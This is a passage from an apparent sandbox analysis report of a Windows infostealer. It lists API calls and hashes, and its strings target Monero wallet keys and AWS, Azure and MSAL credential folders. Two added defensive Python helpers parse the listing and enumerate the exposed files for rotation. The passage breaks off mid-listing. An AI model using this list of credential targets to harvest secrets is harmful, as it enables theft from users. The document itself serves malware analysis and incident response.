                          • Instruction Fuzzy Hash: D512F371A20118ABCB16EBA0DCA5FEEB37DBF15700F0045A9F14A66093DF706A49CF65
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 00038CF0: GetSystemTime.KERNEL32(00040E1B,00FDA5D0,000405B6,?,?,000213F9,?,0000001A,00040E1B,00000000,?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 00038D16
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0002D083
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0002D1C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0002D1CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D308
                          • lstrcat.KERNEL32(?,00041570), ref: 0002D317
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D32A
                          • lstrcat.KERNEL32(?,00041574), ref: 0002D339
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D34C
                          • lstrcat.KERNEL32(?,00041578), ref: 0002D35B
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D36E
                          • lstrcat.KERNEL32(?,0004157C), ref: 0002D37D
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D390
                          • lstrcat.KERNEL32(?,00041580), ref: 0002D39F
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D3B2
                          • lstrcat.KERNEL32(?,00041584), ref: 0002D3C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0002D3D4
                          • lstrcat.KERNEL32(?,00041588), ref: 0002D3E3
                            • Part of subcall function 0003AB30: lstrlen.KERNEL32(00024F55,?,?,00024F55,00040DDF), ref: 0003AB3B
                            • Part of subcall function 0003AB30: lstrcpy.KERNEL32(00040DDF,00000000), ref: 0003AB95
                          • lstrlen.KERNEL32(?), ref: 0002D42A
                          • lstrlen.KERNEL32(?), ref: 0002D439
                            • Part of subcall function 0003AD80: StrCmpCA.SHLWAPI(00000000,00041568,0002D2A2,00041568,00000000), ref: 0003AD9F
                          • DeleteFileA.KERNEL32(00000000), ref: 0002D4B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: d6ab533ca6baa1a56674cf8c7849a94695da9bfc02944b213453497d50a605cc
                          • Instruction ID: e9844746a4d9bd415d16b305b4f6417ab4713bc6392bc83b7c26ad7b565c997e
                          • Opcode Fuzzy Hash: d6ab533ca6baa1a56674cf8c7849a94695da9bfc02944b213453497d50a605cc
                          • Instruction Fuzzy Hash: AFE15671A10108ABCB05EBA0ED6AEEE737DAF15301F104569F547760A3DF31AE48CB66
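The call listings in this section all share one line shape: an API name and module, an argument list as the tool recovered it from the stack (8-digit hex values, "?" for slots it could not resolve, inline strings where it could), a "ref:" call-site address, and a "Part of subcall function" prefix on lines that belong to a callee rather than to the function itself. The Python below is an added triage helper, not part of the report or of Joe Sandbox: it parses such lines into records, separates a function's own calls from its callees', and names a hand-picked subset of Win32 constants that otherwise appear as bare hex. Which constants to include is the editor's choice, an assumption about what matters for this sample; the sample lines are copied from the CreateFileA and RegOpenKeyExA functions later in this section.

```python
"""Parse the 'APIs' call listings of a Joe Sandbox report into records.

Added helper for triaging long reports; it is not part of the report or of
Joe Sandbox. KNOWN is a small hand-picked subset of Win32 values, chosen
because they occur in this report (an assumption about what matters).
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Line shapes seen in the report:
#   • CreateFileA.KERNEL32(00000000,80000000,...), ref: 0002CB6C
#   • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
#   • wsprintfA.USER32 ref: 000385E9          (variadic call, no argument list)
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)"
    r"(?:\((?P<args>.*)\))?"
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$"
)

# (API, zero-based argument index) -> {value: symbolic name}
KNOWN = {
    ("CreateFileA", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
    ("CreateFileA", 2): {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 3: "FILE_SHARE_READ|FILE_SHARE_WRITE"},
    ("CreateFileA", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"},
    ("SetFilePointer", 3): {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"},
    ("RegOpenKeyExA", 3): {0x20019: "KEY_READ", 0xF003F: "KEY_ALL_ACCESS"},
    ("SHGetFolderPathA", 1): {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"},
    ("InternetOpenA", 1): {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT"},
    ("InternetConnectA", 5): {3: "INTERNET_SERVICE_HTTP"},
    ("LocalAlloc", 0): {0x40: "LPTR"},
}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: Optional[str]      # address of the call site
    subcall: Optional[str]  # set when the line belongs to a callee, not this function

    @property
    def direct(self) -> bool:
        return self.subcall is None

    def decoded_args(self) -> List[str]:
        """Replace bare hex values with names where KNOWN covers that slot."""
        out = []
        for i, a in enumerate(self.args):
            table = KNOWN.get((self.api, i))
            try:
                out.append(table.get(int(a, 16), a) if table else a)
            except ValueError:  # '?' (unresolved) or an inline string such as \Monero\wallet.keys
                out.append(a)
        return out


def parse_api_lines(text: str) -> List[Call]:
    calls: List[Call] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # section headers such as 'APIs' or 'Strings'
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def call_chain(calls: List[Call]) -> List[str]:
    """This function's own calls in report order; subcall lines belong to callees."""
    return [c.api for c in calls if c.direct]


def describe(calls: List[Call]) -> List[str]:
    """One readable line per direct call, with known constants decoded."""
    return [f"{c.ref}: {c.api}({', '.join(c.decoded_args())})" for c in calls if c.direct]


# Lines copied from the CreateFileA/ReadFile and RegOpenKeyExA functions of this report.
SAMPLE = """\
  • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00FDD0C8,00000000,?,00041544,00000000,?,?), ref: 0002CB6C
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0002CB89
• GetFileSize.KERNEL32(00000000,00000000), ref: 0002CB95
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0002CBA8
• ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0002CBD9
• StrStrA.SHLWAPI(?,00FDCFA8,00040B56), ref: 0002CBF7
  • Part of subcall function 0002C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0002C97C
• CloseHandle.KERNEL32(00000000), ref: 0002CF9C
• RegOpenKeyExA.ADVAPI32(00000000,00FDB0C8,00000000,00020019,00000000,000405BE), ref: 00038534
• wsprintfA.USER32 ref: 000385E9
"""

if __name__ == "__main__":
    for line in describe(parse_api_lines(SAMPLE)):
        print(line)
```

The argument lists are a fixed window of stack slots, so entries beyond an API's documented parameter count (the trailing values on the CreateFileA line, for instance) are stack residue; the decoder therefore only names slots at their documented positions and leaves everything else as the tool printed it.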
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00FDD0C8,00000000,?,00041544,00000000,?,?), ref: 0002CB6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0002CB89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0002CB95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0002CBA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0002CBD9
                          • StrStrA.SHLWAPI(?,00FDCFA8,00040B56), ref: 0002CBF7
                          • StrStrA.SHLWAPI(00000000,00FDCFC0), ref: 0002CC1E
                          • StrStrA.SHLWAPI(?,00FDD8A0,00000000,?,00041550,00000000,?,00000000,00000000,?,00FD8FA8,00000000,?,0004154C,00000000,?), ref: 0002CDA2
                          • StrStrA.SHLWAPI(00000000,00FDD920), ref: 0002CDB9
                            • Part of subcall function 0002C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0002C971
                            • Part of subcall function 0002C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0002C97C
                          • StrStrA.SHLWAPI(?,00FDD920,00000000,?,00041554,00000000,?,00000000,00FD9088), ref: 0002CE5A
                          • StrStrA.SHLWAPI(00000000,00FD92A8), ref: 0002CE71
                            • Part of subcall function 0002C920: lstrcat.KERNEL32(?,00040B47), ref: 0002CA43
                            • Part of subcall function 0002C920: lstrcat.KERNEL32(?,00040B4B), ref: 0002CA57
                            • Part of subcall function 0002C920: lstrcat.KERNEL32(?,00040B4E), ref: 0002CA78
                          • lstrlen.KERNEL32(00000000), ref: 0002CF44
                          • CloseHandle.KERNEL32(00000000), ref: 0002CF9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: aeb999a6d1fa11b0818241e99a9fd8610ad507fdbdd988e3615496e9dc12562d
                          • Instruction ID: 77aa56bf9fcf5e4254f0791e1627e4a309b9a71bf942aa145b5192b335932d8e
                          • Opcode Fuzzy Hash: aeb999a6d1fa11b0818241e99a9fd8610ad507fdbdd988e3615496e9dc12562d
                          • Instruction Fuzzy Hash: 0AE1F071A10108ABCB16EBA4DCA6FEEB77DAF55300F0041A9F14667193EF306A49CF65
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • RegOpenKeyExA.ADVAPI32(00000000,00FDB0C8,00000000,00020019,00000000,000405BE), ref: 00038534
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000385B6
                          • wsprintfA.USER32 ref: 000385E9
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0003860B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0003861C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00038629
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s
                          • API String ID: 3246050789-1643714437
                          • Opcode ID: f9a421dba320ef2feb554cc327bbcd8ddb79e187221c634cf56f69aac9cbf5ae
                          • Instruction ID: e351076c88fe42db0274b040a27de49722d82ee38f11fcc0716ab1425ebecfd7
                          • Opcode Fuzzy Hash: f9a421dba320ef2feb554cc327bbcd8ddb79e187221c634cf56f69aac9cbf5ae
                          • Instruction Fuzzy Hash: 1C811B71A142189BDB25DB54DD95FEAB7BDBB48310F1082D8F249A6141DF70AB84CFA0
                          APIs
                            • Part of subcall function 00038F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00038F9B
                          • lstrcat.KERNEL32(?,00000000), ref: 00035000
                          • lstrcat.KERNEL32(?,\.azure\), ref: 0003501D
                            • Part of subcall function 00034B60: wsprintfA.USER32 ref: 00034B7C
                            • Part of subcall function 00034B60: FindFirstFileA.KERNEL32(?,?), ref: 00034B93
                          • lstrcat.KERNEL32(?,00000000), ref: 0003508C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 000350A9
                            • Part of subcall function 00034B60: StrCmpCA.SHLWAPI(?,00040FC4), ref: 00034BC1
                            • Part of subcall function 00034B60: StrCmpCA.SHLWAPI(?,00040FC8), ref: 00034BD7
                            • Part of subcall function 00034B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00034DCD
                            • Part of subcall function 00034B60: FindClose.KERNEL32(000000FF), ref: 00034DE2
                          • lstrcat.KERNEL32(?,00000000), ref: 00035118
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00035135
                            • Part of subcall function 00034B60: wsprintfA.USER32 ref: 00034C00
                            • Part of subcall function 00034B60: StrCmpCA.SHLWAPI(?,000408D3), ref: 00034C15
                            • Part of subcall function 00034B60: wsprintfA.USER32 ref: 00034C32
                            • Part of subcall function 00034B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00034C6E
                            • Part of subcall function 00034B60: lstrcat.KERNEL32(?,00FDEAE8), ref: 00034C9A
                            • Part of subcall function 00034B60: lstrcat.KERNEL32(?,00040FE0), ref: 00034CAC
                            • Part of subcall function 00034B60: lstrcat.KERNEL32(?,?), ref: 00034CC0
                            • Part of subcall function 00034B60: lstrcat.KERNEL32(?,00040FE4), ref: 00034CD2
                            • Part of subcall function 00034B60: lstrcat.KERNEL32(?,?), ref: 00034CE6
                            • Part of subcall function 00034B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00034CFC
                            • Part of subcall function 00034B60: DeleteFileA.KERNEL32(?), ref: 00034D81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: b9576c160bb96a8f8929d0aa1934ae06bbf75dc24e6b16550c86a8a624c2f17a
                          • Instruction ID: af5c5d5910e28bd3467daef9dc01b6a654c0a9c1c1776d0192e8eddc6255a0de
                          • Opcode Fuzzy Hash: b9576c160bb96a8f8929d0aa1934ae06bbf75dc24e6b16550c86a8a624c2f17a
                          • Instruction Fuzzy Hash: 0941A2BAA4021867DB10E760EC57FED772C5B64704F0045A4B6896A0C2EEF4A7D8CB92
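The strings of the function above ("\.azure\", "\.aws\", "\.IdentityService\", "msal.cache", "*.*") and its subcall (FindFirstFileA/FindNextFileA with two StrCmpCA checks against fixed strings, PathMatchSpecA against the spec, CopyFileA followed by DeleteFileA) describe a walk over cloud CLI and MSAL credential folders in which each matching file is copied to a working location, read, and the copy removed. The Python below is an added responder-side check, not the sample's code and not part of the report: run on a host where the sample executed, it lists the files that walk would have reached and what a responder would typically rotate for each. Assumptions, also marked in the code: the walk is recursive (the report does not show the depth), the roots to check are %USERPROFILE% and %LOCALAPPDATA% (the report resolves CSIDL 0x1C, CSIDL_LOCAL_APPDATA, while .aws and .azure normally sit under the profile), and the rotation notes describe typical contents of those folders rather than what a given host holds. The demo tree is constructed for the offline run.

```python
"""Which cloud-credential files the sample's folder walk would have reached.

Added example, not part of the report. The folder names, the file name
msal.cache and the '*.*' spec are the strings the report lists for this
function; its FindFirstFileA/FindNextFileA loop with CopyFileA/DeleteFileA is
mirrored as a directory walk. Assumptions: the walk is recursive (the report
does not show the depth), the roots are %USERPROFILE% and %LOCALAPPDATA%, and
ROTATE describes typical contents of the folders, not what this host holds.
"""
import os
import tempfile
from typing import List, Tuple

TARGET_DIRS = (".azure", ".aws", ".IdentityService")  # strings from the report
TARGET_FILE = "msal.cache"                             # string from the report

# What a responder should expect to rotate per hit (typical contents, an assumption).
ROTATE = {
    ".aws": "AWS access keys and session tokens (credentials, config)",
    ".azure": "Azure CLI tokens (msal_token_cache.*, accessTokens.json)",
    ".IdentityService": "MSAL token caches of Visual Studio / Azure tooling",
    TARGET_FILE: "stand-alone MSAL token cache",
}


def _walk(folder: str) -> List[str]:
    """Recursive stand-in for the FindFirstFileA/FindNextFileA loop over '*.*'.
    os.listdir never yields '.' or '..', which the sample skips with StrCmpCA."""
    found: List[str] = []
    for entry in sorted(os.listdir(folder)):
        path = os.path.join(folder, entry)
        found.extend(_walk(path) if os.path.isdir(path) else [path])
    return found


def collect_targets(roots: List[str]) -> List[Tuple[str, str]]:
    """(label, path) for every file the sample's search would copy out."""
    hits: List[Tuple[str, str]] = []
    seen = set()
    for root in roots:
        for name in TARGET_DIRS:
            folder = os.path.join(root, name)
            if os.path.isdir(folder):
                for path in _walk(folder):
                    hits.append((name, path))
                    seen.add(path)
        # msal.cache is matched by name wherever it sits under the root
        for dirpath, _, files in os.walk(root):
            for f in files:
                path = os.path.join(dirpath, f)
                if f.lower() == TARGET_FILE and path not in seen:
                    hits.append((TARGET_FILE, path))
                    seen.add(path)
    return hits


def rotation_list(hits: List[Tuple[str, str]]) -> List[str]:
    return sorted({ROTATE[label] for label, _ in hits})


def default_roots() -> List[str]:
    """%USERPROFILE% and %LOCALAPPDATA% on a Windows host (assumed roots)."""
    return [v for v in (os.environ.get("USERPROFILE"), os.environ.get("LOCALAPPDATA")) if v]


def build_demo_tree() -> str:
    """Constructed profile layout for an offline run; not data from the report."""
    root = tempfile.mkdtemp(prefix="profile_")
    for rel in (".aws/credentials", ".azure/msal_token_cache.json",
                ".IdentityService/msal.cache", "Stray/msal.cache", "Documents/notes.txt"):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()
    return root


if __name__ == "__main__":
    roots = default_roots() or [build_demo_tree()]
    hits = collect_targets(roots)
    for label, path in hits:
        print(f"{label:18} {path}")
    print("rotate:", *rotation_list(hits), sep="\n  ")
```

Because the sample copies each file before reading it and deletes the copy afterwards (CopyFileA then DeleteFileA in the subcall), file-creation and deletion telemetry for these names outside their home folders is a second place to look when confirming that the walk actually ran.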
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 000391FC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: f51bcc36992a3d2a88ec235ae35ae928130766af83cf5fa085c5e7426ea6ce4b
                          • Instruction ID: e81190c0c432566f7b89d6450d72ab22ce78793a3b0db2972e866efcab29d209
                          • Opcode Fuzzy Hash: f51bcc36992a3d2a88ec235ae35ae928130766af83cf5fa085c5e7426ea6ce4b
                          • Instruction Fuzzy Hash: 6471FCB1A10208EBDB14DFE4EC89FEEB7B9BF48750F108558F516A7290DB74A904CB60
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00033415
                          • ShellExecuteEx.SHELL32(0000003C), ref: 000335AD
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0003373A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
